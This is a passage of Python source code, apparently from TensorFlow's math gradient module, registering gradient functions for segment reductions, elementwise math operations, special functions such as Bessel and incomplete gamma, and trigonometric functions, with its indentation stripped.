# For complex inputs, the gradient is in the conjugate direction.
y = array_ops.reshape(
math_ops.conj(left) * math_ops.conj(right), permuted_shape)
# Invert the transpose and reshape operations.
# Make sure to set the statically known shape information through a reshape.
out = grad * array_ops.transpose(y, array_ops.invert_permutation(perm))
return array_ops.reshape(out, input_shape), None
@ops.RegisterGradient("SegmentSum")
def _SegmentSumGrad(op, grad):
"""Gradient for SegmentSum."""
return array_ops.gather(grad, op.inputs[1]), None
@ops.RegisterGradient("SegmentMean")
def _SegmentMeanGrad(op, grad):
"""Gradient for SegmentMean."""
input_rank = array_ops.rank(op.inputs[0])
ones_shape = array_ops.concat([
array_ops.shape(op.inputs[1]),
array_ops.fill(array_ops.expand_dims(input_rank - 1, 0), 1)
], 0)
ones = array_ops.fill(ones_shape, constant_op.constant(1, dtype=grad.dtype))
scaled_grad = math_ops.divide(grad, math_ops.segment_sum(ones, op.inputs[1]))
return array_ops.gather(scaled_grad, op.inputs[1]), None
@ops.RegisterGradient("SparseSegmentSum")
def _SparseSegmentSumGrad(op, grad):
"""Gradient for SparseSegmentSum."""
input_rows = array_ops.shape(op.inputs[0])[0]
return (math_ops.unsorted_segment_sum(
array_ops.gather(grad, op.inputs[2]), op.inputs[1], input_rows), None,
None)
@ops.RegisterGradient("SparseSegmentSumWithNumSegments")
def _SparseSegmentSumWithNumSegmentsGrad(op, grad):
"""Gradient for SparseSegmentSumWithNumSegments."""
input_rows = array_ops.shape(op.inputs[0])[0]
return (math_ops.unsorted_segment_sum(
array_ops.gather(grad, op.inputs[2]), op.inputs[1], input_rows), None,
None, None)
@ops.RegisterGradient("SparseSegmentMean")
def _SparseSegmentMeanGrad(op, grad):
"""Gradient for SparseSegmentMean."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_mean_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
@ops.RegisterGradient("SparseSegmentMeanWithNumSegments")
def _SparseSegmentMeanWithNumSegmentsGrad(op, grad):
"""Gradient for SparseSegmentMeanWithNumSegments."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_mean_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None, None)
@ops.RegisterGradient("SparseSegmentSqrtN")
def _SparseSegmentSqrtNGrad(op, grad):
"""Gradient for SparseSegmentSqrtN."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_sqrt_n_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
@ops.RegisterGradient("SparseSegmentSqrtNWithNumSegments")
def _SparseSegmentSqrtNWithNumSegmentsGrad(op, grad):
"""Gradient for SparseSegmentSqrtNWithNumSegments."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_sqrt_n_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None, None)
def _SegmentMinOrMaxGrad(op, grad):
""" Gradient for SegmentMin and SegmentMax. """
zeros = array_ops.zeros_like(op.inputs[0], dtype=op.inputs[0].dtype)
# Get the number of selected (minimum or maximum) elements in each segment.
gathered_outputs = array_ops.gather(op.outputs[0], op.inputs[1])
is_selected = math_ops.equal(op.inputs[0], gathered_outputs)
num_selected = math_ops.segment_sum(
math_ops.cast(is_selected, grad.dtype), op.inputs[1])
# Compute the gradient for each segment. The gradient for the ith segment is
# divided evenly among the selected elements in that segment.
weighted_grads = math_ops.divide(grad, num_selected)
gathered_grads = array_ops.gather(weighted_grads, op.inputs[1])
return array_ops.where_v2(is_selected, gathered_grads, zeros), None
@ops.RegisterGradient("SegmentMin")
def _SegmentMinGrad(op, grad):
"""Gradient for SegmentMin."""
return _SegmentMinOrMaxGrad(op, grad)
@ops.RegisterGradient("SegmentMax")
def _SegmentMaxGrad(op, grad):
"""Gradient for SegmentMax."""
return _SegmentMinOrMaxGrad(op, grad)
@ops.RegisterGradient("SegmentProd")
def _SegmentProdGrad(op, grad):
"""Gradient for SegmentProd.
The gradient can be expressed for each segment by dividing the segment's
product by each element of the segment input tensor, but this approach can't
deal with zeros in the input.
Unlike reduce_prod we can't use cumsum here as individual segments may have
a different number of elements. Therefore we consider three cases:
1) A segment input contains no zeros and we can safely divide by the input
tensor.
2) A segment contains exactly one zero. Then the gradient of each input of
the segment is zero except for the 0-input, there the gradient is
the product of the remaining segment entries.
3) A segment contains at least two zeros. The gradient is zero for all
segment inputs.
"""
data = op.inputs[0]
segment_ids = op.inputs[1]
is_zero = math_ops.equal(data, 0)
num_zeros = gen_math_ops.segment_sum(
math_ops.cast(is_zero, dtype=dtypes.int32), segment_ids)
# handle case 3 and set the gradient to 0 for segments with more than one
# 0 as input
grad = array_ops.where_v2(
math_ops.greater(num_zeros, 1), array_ops.zeros_like(grad), grad)
# replace all zeros with ones and compute the segment_prod
non_zero_data = array_ops.where_v2(is_zero, array_ops.ones_like(data), data)
non_zero_prod = gen_math_ops.segment_prod(non_zero_data, segment_ids)
gathered_prod = array_ops.gather(op.outputs[0], segment_ids)
gathered_non_zero_prod = array_ops.gather(non_zero_prod, segment_ids)
prod_divided_by_el = gathered_prod / non_zero_data
# Now fetch the individual results for segments containing 0 and those that
# don't.
partial_derivative = array_ops.where_v2(is_zero, gathered_non_zero_prod,
prod_divided_by_el)
gathered_grad = array_ops.gather(grad, segment_ids)
return gathered_grad * partial_derivative, None
def _GatherDropNegatives(params,
ids,
zero_clipped_indices=None,
is_positive=None):
""" Helper function for unsorted segment ops.
Gathers params for
positive segment ids and gathers 0 for inputs with negative segment id.
Also returns the clipped indices and a boolean mask with the same shape
as ids where a positive id is masked as true. With this, the latter two
can be passed as arguments to this function to reuse them.
"""
if zero_clipped_indices is None:
zero_clipped_indices = math_ops.maximum(ids, array_ops.zeros_like(ids))
gathered = array_ops.gather(params, zero_clipped_indices)
if is_positive is None:
is_positive = math_ops.greater_equal(ids, 0)
# tf.where(condition, x, y) requires condition to have the same shape as x
# and y.
is_positive_shape = array_ops.shape(is_positive)
broadcastable_shape = array_ops.concat(
[is_positive_shape,
array_ops.ones([array_ops.rank(gathered)
- array_ops.rank(is_positive)],
dtype=is_positive_shape.dtype)],
axis=0)
is_positive = array_ops.reshape(is_positive, broadcastable_shape)
is_positive = (
is_positive & array_ops.ones_like(gathered, dtype=dtypes.bool))
# replace gathered params of negative indices with 0
zero_slice = array_ops.zeros_like(gathered)
return (array_ops.where_v2(is_positive, gathered,
zero_slice), zero_clipped_indices, is_positive)
def _UnsortedSegmentMinOrMaxGrad(op, grad):
""" Gradient for UnsortedSegmentMin and UnsortedSegmentMax. """
# Get the number of selected (minimum or maximum) elements in each segment.
gathered_outputs, zero_clipped_indices, is_positive = \
_GatherDropNegatives(op.outputs[0], op.inputs[1])
is_selected = math_ops.equal(op.inputs[0], gathered_outputs)
is_selected = math_ops.logical_and(is_selected, is_positive)
num_selected = math_ops.unsorted_segment_sum(
math_ops.cast(is_selected, grad.dtype), op.inputs[1], op.inputs[2])
# Compute the gradient for each segment. The gradient for the ith segment is
# divided evenly among the selected elements in that segment.
weighted_grads = math_ops.divide(grad, num_selected)
gathered_grads, _, _ = _GatherDropNegatives(weighted_grads, None,
zero_clipped_indices, is_positive)
zeros = array_ops.zeros_like(gathered_grads)
return array_ops.where_v2(is_selected, gathered_grads, zeros), None, None
@ops.RegisterGradient("UnsortedSegmentSum")
def _UnsortedSegmentSumGrad(op, grad):
"""Gradient for UnsortedSegmentSum."""
return _GatherDropNegatives(grad, op.inputs[1])[0], None, None
@ops.RegisterGradient("UnsortedSegmentMax")
def _UnsortedSegmentMaxGrad(op, grad):
""" Gradient for UnsortedSegmentMax. """
return _UnsortedSegmentMinOrMaxGrad(op, grad)
@ops.RegisterGradient("UnsortedSegmentMin")
def _UnsortedSegmentMinGrad(op, grad):
""" Gradient for UnsortedSegmentMin. """
return _UnsortedSegmentMinOrMaxGrad(op, grad)
@ops.RegisterGradient("UnsortedSegmentProd")
def _UnsortedSegmentProdGrad(op, grad):
""" Gradient for UnsortedSegmentProd.
The gradient can be expressed for each segment by dividing the segment's
product by each element of the segment input tensor, but this approach can't
deal with zeros in the input.
Unlike reduce_prod we can't use cumsum here as individual segments may have
a different number of elements. Therefore we consider three cases:
1) A segment input contains no zeros and we can safely divide by the input
tensor.
2) A segment contains exactly one zero. Then the gradient of each input of
the segment is zero except for the 0-input, there the gradient is
the product of the remaining segment entries.
3) A segment contains at least two zeros. The gradient is zero for all
segment inputs.
"""
# Note that unsorted_segment_sum will filter out the negative indices,
# so we don't need to do a logical_and with is_positive here
is_zero = math_ops.equal(op.inputs[0], 0)
num_zeros = gen_math_ops.unsorted_segment_sum(
math_ops.cast(is_zero, dtype=dtypes.int32), op.inputs[1], op.inputs[2])
# handle case 3 and set the gradient to 0 for segments with more than one
# 0 as input
grad = array_ops.where_v2(
math_ops.greater(num_zeros, 1), array_ops.zeros_like(grad), grad)
# replace all zeros with ones and compute the unsorted_segment_prod
non_zero_data = array_ops.where_v2(is_zero, array_ops.ones_like(op.inputs[0]),
op.inputs[0])
non_zero_prod = gen_math_ops.unsorted_segment_prod(non_zero_data,
op.inputs[1], op.inputs[2])
# clip the indices for gather to be positive
zero_clipped_indices = math_ops.maximum(op.inputs[1],
array_ops.zeros_like(op.inputs[1]))
gathered_prod = array_ops.gather(op.outputs[0], zero_clipped_indices)
gathered_non_zero_prod = array_ops.gather(non_zero_prod, zero_clipped_indices)
prod_divided_by_el = gathered_prod / op.inputs[0] # May contain nan/inf.
# Now fetch the individual results for segments containing 0 and those that
# don't. is_zero will also fetch results for entries with negative index
# but the following gather_drop_negatives sets the corresponding entry in
# grad to 0 for these
partial_derivative = array_ops.where_v2(is_zero, gathered_non_zero_prod,
prod_divided_by_el)
gathered_grad = _GatherDropNegatives(grad, op.inputs[1],
zero_clipped_indices)[0]
return gathered_grad * partial_derivative, None, None
@ops.RegisterGradient("Abs")
def _AbsGrad(op, grad):
x = op.inputs[0]
return grad * math_ops.sign(x)
@ops.RegisterGradient("Neg")
def _NegGrad(_, grad):
"""Returns -grad."""
return -grad
@ops.RegisterGradient("Inv")
def _InvGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
return gen_math_ops.reciprocal_grad(y, grad)
@ops.RegisterGradient("Reciprocal")
def _ReciprocalGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
return gen_math_ops.reciprocal_grad(y, grad)
@ops.RegisterGradient("InvGrad")
def _InvGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
return cg * -2.0 * b * ca, gen_math_ops.reciprocal_grad(ca, grad)
@ops.RegisterGradient("ReciprocalGrad")
def _ReciprocalGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
return cg * -2.0 * b * ca, gen_math_ops.reciprocal_grad(ca, grad)
@ops.RegisterGradient("Square")
def _SquareGrad(op, grad):
x = op.inputs[0]
# Added control dependencies to prevent 2*x from being computed too early.
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
y = constant_op.constant(2.0, dtype=x.dtype)
return math_ops.multiply(grad, math_ops.multiply(x, y))
@ops.RegisterGradient("Sqrt")
def _SqrtGrad(op, grad):
y = op.outputs[0] # y = x^(1/2)
return gen_math_ops.sqrt_grad(y, grad)
@ops.RegisterGradient("SqrtGrad")
def _SqrtGradGrad(op, grad):
a = op.inputs[0]
y = op.outputs[0] # y = 0.5 * b / conj(a)
with ops.control_dependencies([grad]):
ga = grad / a
return -math_ops.conj(ga) * y, 0.5 * ga
@ops.RegisterGradient("Rsqrt")
def _RsqrtGrad(op, grad):
"""Returns -0.5 * grad * conj(y)^3."""
y = op.outputs[0] # y = x^(-1/2)
return gen_math_ops.rsqrt_grad(y, grad)
@ops.RegisterGradient("RsqrtGrad")
def _RsqrtGradGrad(op, grad):
"""Returns backprop gradient for f(a,b) = -0.5 * b * conj(a)^3."""
a = op.inputs[0] # a = x^{-1/2}
b = op.inputs[1] # backprop gradient for a
with ops.control_dependencies([grad]):
ca = math_ops.conj(a)
cg = math_ops.conj(grad)
grad_a = -1.5 * cg * b * math_ops.square(ca)
grad_b = gen_math_ops.rsqrt_grad(ca, grad)
return grad_a, grad_b
@ops.RegisterGradient("Exp")
def _ExpGrad(op, grad):
"""Returns grad * exp(x)."""
y = op.outputs[0] # y = e^x
with ops.control_dependencies([grad]):
y = math_ops.conj(y)
return grad * y
@ops.RegisterGradient("Expm1")
def _Expm1Grad(op, grad):
"""Returns grad * exp(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
y = math_ops.exp(x)
return grad * y
@ops.RegisterGradient("Log")
def _LogGrad(op, grad):
"""Returns grad * (1/x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(x)
@ops.RegisterGradient("Log1p")
def _Log1pGrad(op, grad):
"""Returns grad * (1/(1 + x))."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(1 + x)
@ops.RegisterGradient("Xlogy")
def _XLogyGrad(op, grad):
"""Returns gradient of xlogy(x, y) with respect to x and y."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
with ops.control_dependencies([grad]):
not_zero_x = math_ops.cast(
math_ops.not_equal(x, math_ops.cast(0., dtype=x.dtype)), dtype=x.dtype)
partial_x = gen_math_ops.xlogy(not_zero_x, y)
partial_y = gen_math_ops.xdivy(x, y)
return (array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx),
array_ops.reshape(math_ops.reduce_sum(partial_y * grad, ry), sy))
@ops.RegisterGradient("Xlog1py")
def _XLog1pyGrad(op, grad):
"""Returns gradient of xlog1py(x, y) with respect to x and y."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
with ops.control_dependencies([grad]):
not_zero_x = math_ops.cast(
math_ops.not_equal(x, math_ops.cast(0., dtype=x.dtype)), dtype=x.dtype)
partial_x = gen_math_ops.xlog1py(not_zero_x, y)
partial_y = gen_math_ops.xdivy(x, y + 1.)
return (array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx),
array_ops.reshape(math_ops.reduce_sum(partial_y * grad, ry), sy))
@ops.RegisterGradient("Xdivy")
def _XDivyGrad(op, grad):
"""Returns gradient of xdivy(x, y) with respect to x and y."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
with ops.control_dependencies([grad]):
not_zero_x = math_ops.cast(
math_ops.not_equal(x, math_ops.cast(0., dtype=x.dtype)), dtype=x.dtype)
partial_x = gen_math_ops.xdivy(not_zero_x, y)
partial_y = gen_math_ops.xdivy(math_ops.negative(x), y**2)
return (array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx),
array_ops.reshape(math_ops.reduce_sum(partial_y * grad, ry), sy))
@ops.RegisterGradient("Sinh")
def _SinhGrad(op, grad):
"""Returns grad * cosh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.cosh(x)
@ops.RegisterGradient("Cosh")
def _CoshGrad(op, grad):
"""Returns grad * sinh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.sinh(x)
@ops.RegisterGradient("Tanh")
def _TanhGrad(op, grad):
"""Returns grad * (1 - tanh(x) * tanh(x))."""
y = op.outputs[0] # y = tanh(x)
with ops.control_dependencies([grad]):
y = math_ops.conj(y)
return gen_math_ops.tanh_grad(y, grad)
@ops.RegisterGradient("Asinh")
def _AsinhGrad(op, grad):
"""Returns grad * 1/cosh(y)."""
y = op.outputs[0]
with ops.control_dependencies([grad]):
y = math_ops.conj(y)
return grad / math_ops.cosh(y)
@ops.RegisterGradient("Acosh")
def _AcoshGrad(op, grad):
"""Returns grad * 1/sinh(y)."""
y = op.outputs[0]
with ops.control_dependencies([grad]):
y = math_ops.conj(y)
return grad / math_ops.sinh(y)
@ops.RegisterGradient("Atanh")
def _AtanhGrad(op, grad):
"""Returns grad * 1/ (1 - x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
inv = math_ops.reciprocal(math_ops.subtract(one, x2))
return grad * inv
@ops.RegisterGradient("TanhGrad")
def _TanhGradGrad(op, grad):
with ops.control_dependencies([grad]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
return grad * -2.0 * b * a, gen_math_ops.tanh_grad(a, grad)
@ops.RegisterGradient("Erf")
def _ErfGrad(op, grad):
"""Returns grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
two_over_root_pi = constant_op.constant(2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Erfc")
def _ErfcGrad(op, grad):
"""Returns -grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
minus_two_over_root_pi = constant_op.constant(
-2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * minus_two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Erfinv")
def _ErfinvGrad(op, grad):
"""Returns grad * sqrt(pi) / 2 * exp(erfinv(x)**2)."""
root_pi_over_two = constant_op.constant(np.sqrt(np.pi) / 2, dtype=grad.dtype)
with ops.control_dependencies([grad]):
return grad * root_pi_over_two * math_ops.exp(
math_ops.square(op.outputs[0]))
@ops.RegisterGradient("Ndtri")
def _NdtriGrad(op, grad):
"""Returns grad * sqrt(2 * pi) * exp(ndtri(x)**2 / 2)."""
root_two_pi = constant_op.constant(np.sqrt(2 * np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad]):
return grad * root_two_pi * math_ops.exp(
math_ops.square(op.outputs[0]) / 2.)
@ops.RegisterGradient("Lgamma")
def _LgammaGrad(op, grad):
"""Returns grad * digamma(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.digamma(x)
@ops.RegisterGradient("Digamma")
def _DigammaGrad(op, grad):
"""Compute gradient of the digamma function with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
partial_x = math_ops.polygamma(array_ops.constant(1, dtype=x.dtype), x)
return grad * partial_x
@ops.RegisterGradient("Dawsn")
def _DawsnGrad(op, grad):
"""Compute gradient of dawsn(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
return grad * (1. - 2 * x * y)
@ops.RegisterGradient("Expint")
def _ExpintGrad(op, grad):
"""Compute gradient of expint(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
return grad * math_ops.exp(x) / x
@ops.RegisterGradient("FresnelCos")
def _FresnelCosGrad(op, grad):
"""Compute gradient of fresnel_cos(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
return grad * math_ops.cos((np.pi / 2.) * math_ops.square(x))
@ops.RegisterGradient("FresnelSin")
def _FresnelSinGrad(op, grad):
"""Compute gradient of fresnel_sin(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
return grad * math_ops.sin((np.pi / 2.) * math_ops.square(x))
@ops.RegisterGradient("Spence")
def _SpenceGrad(op, grad):
"""Compute gradient of spence(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
partial_x = math_ops.log(x) / (1 - x)
partial_x = array_ops.where(
math_ops.equal(x, 1.), -array_ops.ones_like(x), partial_x)
return grad * partial_x
@ops.RegisterGradient("BesselI0")
def _BesselI0Grad(op, grad):
"""Compute gradient of bessel_i0(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
partial_x = special_math_ops.bessel_i1(x)
return grad * partial_x
@ops.RegisterGradient("BesselI0e")
def _BesselI0eGrad(op, grad):
"""Compute gradient of bessel_i0e(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
partial_x = (special_math_ops.bessel_i1e(x) - math_ops.sign(x) * y)
return grad * partial_x
@ops.RegisterGradient("BesselI1")
def _BesselI1Grad(op, grad):
"""Compute gradient of bessel_i1(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# For x = 0, the correct gradient is 1.0.
# However, the main branch gives NaN because of the division by x, so
# we impute the gradient manually.
# An alternative solution is to express the gradient via bessel_i0 and
# bessel_i2, but the latter is not yet implemented in Eigen.
dy_dx = array_ops.where_v2(
math_ops.equal(x, 0.), math_ops.cast(1., x.dtype),
special_math_ops.bessel_i0(x) - math_ops.div(y, x))
return grad * dy_dx
@ops.RegisterGradient("BesselI1e")
def _BesselI1eGrad(op, grad):
"""Compute gradient of bessel_i1e(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# For x = 0, the correct gradient is 0.5.
# However, the main branch gives NaN because of the division by x, so
# we impute the gradient manually.
# An alternative solution is to express the gradient via bessel_i0e and
# bessel_i2e, but the latter is not yet implemented in Eigen.
dy_dx = array_ops.where_v2(
math_ops.equal(x, 0.), math_ops.cast(0.5, x.dtype),
special_math_ops.bessel_i0e(x) - y *
(math_ops.sign(x) + math_ops.reciprocal(x)))
return grad * dy_dx
@ops.RegisterGradient("BesselK0")
def _BesselK0Grad(op, grad):
"""Compute gradient of bessel_k0(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
partial_x = -special_math_ops.bessel_k1(x)
return grad * partial_x
@ops.RegisterGradient("BesselK0e")
def _BesselK0eGrad(op, grad):
"""Compute gradient of bessel_k0e(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
partial_x = (y - special_math_ops.bessel_k1e(x))
return grad * partial_x
@ops.RegisterGradient("BesselK1")
def _BesselK1Grad(op, grad):
"""Compute gradient of bessel_k1(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# At 0., this is NaN which is fine since the derivative is undefined
# at 0.
partial_x = -special_math_ops.bessel_k0(x) - math_ops.div(y, x)
return grad * partial_x
@ops.RegisterGradient("BesselK1e")
def _BesselK1eGrad(op, grad):
"""Compute gradient of bessel_k1e(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# At 0., this is NaN which is fine since the derivative is undefined
# at 0.
partial_x = (
y * (1. - math_ops.reciprocal(x)) - special_math_ops.bessel_k0e(x))
return grad * partial_x
@ops.RegisterGradient("BesselJ0")
def _BesselJ0Grad(op, grad):
"""Compute gradient of bessel_j0(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
partial_x = -special_math_ops.bessel_j1(x)
return grad * partial_x
@ops.RegisterGradient("BesselJ1")
def _BesselJ1Grad(op, grad):
"""Compute gradient of bessel_j1(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# For x = 0, the correct gradient is 0.5.
# However, the main branch gives NaN because of the division by x, so
# we impute the gradient manually.
# An alternative solution is to express the gradient via bessel_i0e and
# bessel_i2e, but the latter is not yet implemented in Eigen.
dy_dx = array_ops.where_v2(
math_ops.equal(x, 0.), math_ops.cast(0.5, x.dtype),
special_math_ops.bessel_j0(x) - math_ops.div(y, x))
return grad * dy_dx
@ops.RegisterGradient("BesselY0")
def _BesselY0Grad(op, grad):
"""Compute gradient of bessel_y0(x) with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
partial_x = -special_math_ops.bessel_y1(x)
return grad * partial_x
@ops.RegisterGradient("BesselY1")
def _BesselY1Grad(op, grad):
"""Compute gradient of bessel_y1(x) with respect to its argument."""
x = op.inputs[0]
y = op.outputs[0]
with ops.control_dependencies([grad]):
# At 0., this is NaN which is fine since the derivative is undefined
# at 0.
partial_x = special_math_ops.bessel_y0(x) - math_ops.div(y, x)
return grad * partial_x
@ops.RegisterGradient("Igamma")
def _IgammaGrad(op, grad):
"""Returns gradient of igamma(a, x) with respect to a and x."""
a = op.inputs[0]
x = op.inputs[1]
sa = array_ops.shape(a)
sx = array_ops.shape(x)
ra, rx = gen_array_ops.broadcast_gradient_args(sa, sx)
with ops.control_dependencies([grad]):
partial_a = gen_math_ops.igamma_grad_a(a, x)
# Perform operations in log space before summing, because Gamma(a)
# and Gamma'(a) can grow large.
partial_x = math_ops.exp(-x + (a - 1) * math_ops.log(x) -
math_ops.lgamma(a))
return (array_ops.reshape(math_ops.reduce_sum(partial_a * grad, ra), sa),
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Igammac")
def _IgammacGrad(op, grad):
"""Returns gradient of igammac(a, x) = 1 - igamma(a, x) w.r.t. a and x."""
igamma_grad_a, igamma_grad_x = _IgammaGrad(op, grad)
return (-igamma_grad_a, -igamma_grad_x)
@ops.RegisterGradient("Betainc")
def _BetaincGrad(op, grad):
"""Returns gradient of betainc(a, b, x) with respect to x."""
# TODO(ebrevdo): Perhaps add the derivative w.r.t. a, b
a, b, x = op.inputs
# two cases: x is a scalar and a/b are same-shaped tensors, or vice
# versa; so its sufficient to check against shape(a).
sa = array_ops.shape(a)
sx = array_ops.shape(x)
_, rx = gen_array_ops.broadcast_gradient_args(sa, sx)
# Perform operations in log space before summing, because terms
# can grow large.
log_beta = (
gen_math_ops.lgamma(a) + gen_math_ops.lgamma(b) -
gen_math_ops.lgamma(a + b))
# We use xlog1py and xlogy since the derivatives should tend to
# zero one one of the tails when a is 1. or b is 1.
partial_x = math_ops.exp(math_ops.xlog1py(b - 1, -x) +
math_ops.xlogy(a - 1, x) - log_beta)
return (
None, # da
None, # db
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Zeta")
def _ZetaGrad(op, grad):
"""Returns gradient of zeta(x, q) with respect to x and q."""
# TODO(tillahoffmann): Add derivative with respect to x
x = op.inputs[0]
q = op.inputs[1]
# Broadcast gradients
sx = array_ops.shape(x)
sq = array_ops.shape(q)
unused_rx, rq = gen_array_ops.broadcast_gradient_args(sx, sq)
# Evaluate gradient
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
q = math_ops.conj(q)
partial_q = -x * math_ops.zeta(x + 1, q)
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_q * grad, rq), sq))
@ops.RegisterGradient("Polygamma")
def _PolygammaGrad(op, grad):
"""Returns gradient of psi(n, x) with respect to n and x."""
# TODO(tillahoffmann): Add derivative with respect to n
n = op.inputs[0]
x = op.inputs[1]
# Broadcast gradients
sn = array_ops.shape(n)
sx = array_ops.shape(x)
unused_rn, rx = gen_array_ops.broadcast_gradient_args(sn, sx)
# Evaluate gradient
with ops.control_dependencies([grad]):
n = math_ops.conj(n)
x = math_ops.conj(x)
partial_x = math_ops.polygamma(n + 1, x)
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Sigmoid")
def _SigmoidGrad(op, grad):
"""Returns grad * sigmoid(x) * (1 - sigmoid(x))."""
y = op.outputs[0] # y = sigmoid(x)
with ops.control_dependencies([grad]):
y = math_ops.conj(y)
return gen_math_ops.sigmoid_grad(y, grad)
@ops.RegisterGradient("SigmoidGrad")
def _SigmoidGradGrad(op, grad):
with ops.control_dependencies([grad]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
gb = grad * b
return gb - 2.0 * gb * a, gen_math_ops.sigmoid_grad(a, grad)
@ops.RegisterGradient("Sign")
def _SignGrad(op, _):
"""Returns 0."""
x = op.inputs[0]
return array_ops.zeros_like(x)
@ops.RegisterGradient("Sin")
def _SinGrad(op, grad):
"""Returns grad * cos(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return grad * math_ops.cos(x)
@ops.RegisterGradient("Cos")
def _CosGrad(op, grad):
"""Returns grad * -sin(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
return -grad * math_ops.sin(x)
@ops.RegisterGradient("Tan")
def _TanGrad(op, grad):
"""Returns grad * 1/sec^2(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
secx = math_ops.reciprocal(math_ops.cos(x))
secx2 = math_ops.square(secx)
return secx2 * grad
@ops.RegisterGradient("Asin")
def _AsinGrad(op, grad):
"""Returns grad * 1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return grad * inv
@ops.RegisterGradient("Acos")
def _AcosGrad(op, grad):
"""Returns grad * -1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
